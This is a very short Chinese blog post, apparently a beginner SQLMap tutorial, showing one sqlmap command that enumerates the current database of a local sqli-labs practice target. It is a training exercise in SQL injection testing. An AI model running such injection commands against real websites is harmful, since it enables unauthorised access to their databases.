SQLMap入门——获取当前网站数据库的名称

列出当前网站使用的数据库

python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db

posted @ 2022-10-02 21:20  y夏末y  阅读(152)  评论(0)    收藏  举报